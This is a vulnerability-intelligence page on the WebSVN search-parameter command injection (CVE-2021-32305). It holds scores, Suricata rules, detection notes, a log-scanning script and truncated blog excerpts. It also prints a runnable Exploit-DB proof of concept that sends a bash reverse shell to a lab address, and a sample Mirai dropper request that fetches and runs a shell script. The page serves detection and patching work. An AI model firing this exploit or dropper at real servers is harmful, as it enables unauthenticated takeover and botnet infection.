CVE-2021-32305
Published: 2021-05-18
Priority: P1 · 92 · critical · 9.8 · CVSS 3.1
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 86.72% (99.7th percentile)
WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| websvn | websvn | < 2.6.1 | 2.6.1 |
Detection & IOCs (extracted from sources)
suricata (ET Open, SID 2033849)
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT WebSVN 2.6.0 OS Command Injection Inbound (CVE-2021-32305)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/search.php?search=|22 3b|"; fast_pattern; reference:cve,2021-32305; classtype:attempted-admin; sid:2033849; rev:1; metadata:attack_target Server, created_at 2021_08_31, cve CVE_2021_32305, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2021_08_31, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
suricata (ET Open, SID 2033857)
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Mirai Infection Attempt via OS Command Injection Inbound (CVE-2021-32305)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/search.php?search=|22 3b|/bin/bash+wget+http://"; fast_pattern; pcre:"/^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/R"; content:"|3b|+"; within:50; reference:url,unit42.paloaltonetworks.com/cve-2021-32305-websvn/; reference:cve,2021-32305; classtype:attempted-admin; sid:2033857; rev:3; metadata:created_at 2021_08_31, cve CVE_2021_32305, deployment Perimeter, malware_family Mirai, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
suricata (ET Open, SID 2033856)
alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT Possible Mirai Infection Attempt via OS Command Injection Outbound (CVE-2021-32305)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/search.php?search=|22 3b|/bin/bash+wget+http://"; fast_pattern; pcre:"/^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/R"; content:"|3b|+"; within:50; reference:url,unit42.paloaltonetworks.com/cve-2021-32305-websvn/; reference:cve,2021-32305; classtype:attempted-admin; sid:2033856; rev:4; metadata:created_at 2021_08_31, cve CVE_2021_32305, deployment Perimeter, malware_family Mirai, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
- The exploit targets the `search` parameter of `/search.php`. Monitor HTTP GET requests to this endpoint whose `search` value opens with shell metacharacters such as `";` (percent-encoded `%22%3b`, written `|22 3b|` in the rules above): the double quote closes the quoted command argument and the semicolon terminates the command, so whatever follows runs as a new shell command.
- In-the-wild Mirai payloads follow the pattern `/search.php?search=|22 3b|/bin/bash+wget+http://`, then a dotted-quad IP address, then `|3b|+` within the next 50 bytes, as captured in ET SIDs 2033857 (inbound) and 2033856 (outbound, i.e. an already-infected internal host scanning onward).
- After infection the Mirai variant beacons outbound to its C2 on TCP port 666 using a custom text-based protocol; alert on unexpected outbound TCP/666 connections from web servers.
- Dropped Mirai binaries are packed with a modified UPX packer, so stock UPX fails to unpack them; manual unpacking or static analysis of the packed sample is required.
- The dropper shell script fetches and executes binaries for 12 Linux architectures in turn (brute-forcing the target's architecture). Look for a burst of downloads of architecture-specific ELF files by a web-server process shortly after a suspicious WebSVN search request.
- Palo Alto Networks Threat Prevention signature 91280 blocks exploitation of CVE-2021-32305; confirm it is enabled on perimeter NGFWs.
- The vulnerable code path runs from `getListSearch` in `include/svnlook.php` to `runCommand` in `include/command.php`, which hands the concatenated command string to a shell. The fix wraps the search input with `escapeshellarg` before concatenation. The parameter is reachable without authentication, so verify that each deployment reporting 2.6.1 actually carries this change rather than trusting the version string alone.
- The public proof of concept uses a reverse-shell payload pointed at a hardcoded lab address (192.168.1.149:4444); real attacks substitute attacker-controlled infrastructure. Do not treat that address as a production IOC.
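The detection notes above describe what the ET rules key on but not how to apply the same logic to web-server logs after the fact. The following is an added example, not code from the page's sources or from the WebSVN project: it re-implements the two ET content matches (the generic `";` prefix of SID 2033849 and the Mirai dropper shape with the 50-byte window of SIDs 2033856/2033857) over constructed Apache-style access-log lines. The log lines, the IP addresses (documentation ranges) and the dropper file names are all invented for the example; the assumption that a log line contains the raw request line in double quotes is what the regex relies on.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache-style access-log lines; not real traffic. Line 4 mirrors the
# Mirai dropper shape matched by ET SID 2033857. Line 6 keeps the same prefix but
# pushes the next ';' beyond the rule's 50-byte window, so only the generic
# SID 2033849 logic should fire on it. Line 5 is a POST and must be ignored.
SAMPLE_LOG = """\
198.51.100.7 - - [26/Jun/2021:04:11:58 +0000] "GET /websvn/listing.php?repname=trunk HTTP/1.1" 200 3120 "-" "curl/7.68.0"
198.51.100.7 - - [26/Jun/2021:04:11:59 +0000] "GET /websvn/search.php?search=TODO HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Jun/2021:04:12:01 +0000] "GET /search.php?search=%22%3Bid%3B%22 HTTP/1.1" 200 512 "-" "python-requests/2.25.1"
203.0.113.7 - - [26/Jun/2021:04:12:02 +0000] "GET /websvn/search.php?search=%22;/bin/bash+wget+http://198.51.100.23/lolol.sh;+chmod+777+lolol.sh;+sh+lolol.sh;%22 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Jun/2021:04:12:03 +0000] "POST /search.php?search=%22%3Bid%3B%22 HTTP/1.1" 405 0 "-" "python-requests/2.25.1"
203.0.113.9 - - [26/Jun/2021:04:12:04 +0000] "GET /search.php?search=%22;/bin/bash+wget+http://198.51.100.23/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;+sh+x;%22 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

REQ_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')

# Decoded form of the ET content match: ";/bin/bash wget http://<dotted quad>,
# with a "; " required within the next 50 bytes (content:"|3b|+"; within:50).
MIRAI_DROPPER = re.compile(
    r'^";/bin/bash wget http://(?P<ip>(?:\d{1,3}\.){3}\d{1,3})(?P<window>.{0,50})'
)


def query_param(query, name):
    """Return the decoded value of `name` from a raw query string, or None.

    Splits on '&' only: a raw ';' in the payload must stay inside the value,
    which parse_qs on Python versions before 3.9.2 would not guarantee.
    """
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == name:
            return unquote_plus(value)
    return None


def classify_request(method, uri):
    """Classify one request as 'mirai_dropper', 'websvn_cmdi' or None.

    Returns (verdict, download_host); the host is set only for the dropper shape.
    """
    if method != "GET":
        return None, None
    parts = urlsplit(uri)
    if not parts.path.endswith("/search.php"):
        return None, None
    search = query_param(parts.query, "search")
    # SID 2033849: the value opens with "; (a double quote to close the quoted
    # argument, then a semicolon to start a new shell command).
    if search is None or not search.startswith('";'):
        return None, None
    m = MIRAI_DROPPER.match(search)
    if m and "; " in m.group("window"):
        return "mirai_dropper", m.group("ip")
    return "websvn_cmdi", None


def scan_log(text):
    """Run the classifier over access-log text; return (line_no, verdict, host) hits."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = REQ_LINE.search(line)
        if not m:
            continue
        verdict, host = classify_request(m["method"], m["uri"])
        if verdict:
            hits.append((line_no, verdict, host))
    return hits


if __name__ == "__main__":
    for line_no, verdict, host in scan_log(SAMPLE_LOG):
        suffix = f" (payload host {host})" if host else ""
        print(f"line {line_no}: {verdict}{suffix}")
```

The classifier percent-decodes before matching because Suricata's `http.uri` buffer is normalized; matching the raw request line instead would miss the fully encoded probe on line 3. Note that real Apache logs escape a raw `"` in the request line as `\"`, so a production version should unescape the request line first.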
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 10.0 | HIGH (v2 has no critical band) | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | v3 | 9.8 | CRITICAL | |
GHSA
GHSA-rqp6-mfj6-v759 · ghsa_unreviewed · 2022-05-24 · CWE-78 · CRITICAL
WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
VulnCheck
websvn websvn Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck · 2021 · CVSS 9.8 · CRITICAL
WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
Affected: websvn websvn
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/cve-2021-32305-websvn/
Exploit PoC: https://vulncheck.com/xdb/8ca1d56a1fda
Suricata
suricata · 2021-08-31 · CVSS 9.8 · CRITICAL
Three ET Open rules reference this CVE; the full rule text for each is listed above under Detection & IOCs.
- ET EXPLOIT WebSVN 2.6.0 OS Command Injection Inbound (CVE-2021-32305), SID 2033849
- ET EXPLOIT Possible Mirai Infection Attempt via OS Command Injection Inbound (CVE-2021-32305), SID 2033857
- ET EXPLOIT Possible Mirai Infection Attempt via OS Command Injection Outbound (CVE-2021-32305), SID 2033856
Exploit-DB
Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
exploitdb · 2021-06-21 · CVSS 9.8 · CRITICAL
---
# Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
# Date: 20/06/2021
# Exploit Author: g0ldm45k
# Vendor Homepage: https://websvnphp.github.io/
# Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0
# Version: 2.6.0
# Tested on: Docker + Debian GNU/Linux (Buster)
# CVE : CVE-2021-32305
import argparse
import requests
from urllib.parse import quote_plus
# Reverse shell to the author's lab listener (192.168.1.149:4444); replace before use.
PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.149/4444 0>&1'"
# The leading "; closes the double-quoted search argument and ends the command; the trailing ;" re-pairs with the original closing quote so the shell parses the line.
REQUEST_PAYLOAD = '/search.php?search=";{};"'
parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')
parser.add_argument('target', type=str, help="Target URL.")
args = parser.parse_args()
# The Exploit-DB copy is cut off after this condition; the body below is an editorial completion that sends the request.
if args.target.startswith("http://") or args.target.startswith("https://"):
    url = args.target.rstrip("/") + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD))
    requests.get(url, timeout=5)  # the injected shell never returns, so a read timeout is expected
else:
    parser.error("target must start with http:// or https://")
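Why the PoC wraps its command as `";{};"` is easiest to see by running the pattern through a shell. The block below is an added example, not WebSVN code or the PoC author's: it models the vulnerable construction the page describes (user input spliced into a double-quoted argument of a command string handed to `/bin/sh`, as `popen()` does) with a harmless `echo` standing in for the svn invocation, and places the hardened form beside it. `shlex.quote` plays the role PHP's `escapeshellarg` plays in the 2.6.1 fix; the `echo` stand-in and the `search=` prefix are assumptions of the example.

```python
import shlex
import subprocess


def vulnerable_command(search):
    """Pre-fix pattern: raw input concatenated inside a double-quoted argument.

    `echo` stands in for the real svn command; the quoting is what matters.
    """
    return 'echo "search=%s"' % search


def hardened_command(search):
    """Post-fix pattern: the whole argument is quoted as one literal shell word.

    shlex.quote single-quotes the value and escapes embedded single quotes,
    the same job escapeshellarg does in PHP.
    """
    return "echo " + shlex.quote("search=" + search)


def run(cmd):
    """Execute through /bin/sh, exactly as popen() would, and return stdout."""
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_vulnerable(search):
    return run(vulnerable_command(search)).splitlines()


def run_hardened(search):
    return run(hardened_command(search)).splitlines()


# Same wrapping as the PoC's REQUEST_PAYLOAD ('";{};"'): the leading quote closes
# the argument, ';' ends the command, and the trailing ';"' pairs with the
# original closing quote, so the shell sees `echo "search=";echo INJECTED;""`
# and executes the injected command as a separate statement.
INJECTION = '";echo INJECTED;"'

if __name__ == "__main__":
    print(vulnerable_command(INJECTION), "->", run_vulnerable(INJECTION))
    print(hardened_command(INJECTION), "->", run_hardened(INJECTION))
```

With the hardened form the same input is printed back verbatim; a payload built around a single quote instead (`'; echo INJECTED; '`) is likewise neutralised, because `shlex.quote` escapes it rather than letting it close the word.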
Nuclei
Websvn <2.6.1 - Remote Code Execution
nuclei · CVSS 9.8 · CRITICAL
WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
Template:
id: CVE-2021-32305
info:
  name: Websvn <2.6.1 - Remote Code Execution
  author: gy741
  severity: critical
  description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade Websvn to version 2.6.1 or later to mitigate this vulnerability.
  reference:
    - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html
    - https://github.com/websvnphp/websvn/pull/142
    - http://packetstormsecu
Unit42
Network Security Trends: May-July 2021
blogs_unit42 · 2021-09-17
Yue Guan, Lei Xu · Published: September 17, 2021
Tags: Malware, Trend Reports, Vulnerabilities, Attack analysis, Exploit, Exploit in the wild, Network security trends
## Executive Summary
Unit 42 researchers continue to observe network security trends, tracking how cybercriminals take advantage of vulnerabilities in the real world. The following sections present our analysis of the most recently published vulnerabilities, including their severity and category distribution. Additionally, we provide insight into how the vulnerabilities are exploited in the wild based on real-world data collected from Palo Alto Networks Next-Generation Firewalls. We highlight vulnerabilities ranked medium severity and above that were newly published from May-July 2021 in order to raise awareness of their active exploits in the wild. We then draw conclusions about the most commonly exploited vulnerabilities we observed attackers using, as well as the severity, category and
Unit42
New Mirai Variant Targets WebSVN Command Injection Vulnerability (CVE-2021-32305)
blogs_unit42 · 2021-08-30 · CVSS 9.8 · CRITICAL
Brock Mammen, Haozhe Zhang · Published: August 30, 2021
Tags: Threat Research, Vulnerabilities, Botnet, CVE-2021-32305, DDoS, WebSVN
## Executive Summary
We have observed exploits in the wild for a recently disclosed command injection vulnerability affecting WebSVN, an open-source web application for browsing source code. The critical command injection vulnerability was discovered and patched in May 2021. A proof of concept was released and within a week, on June 26, 2021, attackers exploited the vulnerability to deploy variants of the Mirai DDoS malware. We strongly recommend that WebSVN users upgrade to the latest software version.
Palo Alto Networks Next-Generation Firewalls protect customers from the exploitation of CVE-2021-32305, and Cortex XDR detects Mirai variants and prevents infection.
## Root Cause and Patch Analysis of CVE-2021-32305
Like many source code browsing tools, WebSVN allows users to search th
Greynoiseio
Malicious Tag Roundup (January 2022)
blogs_greynoiseio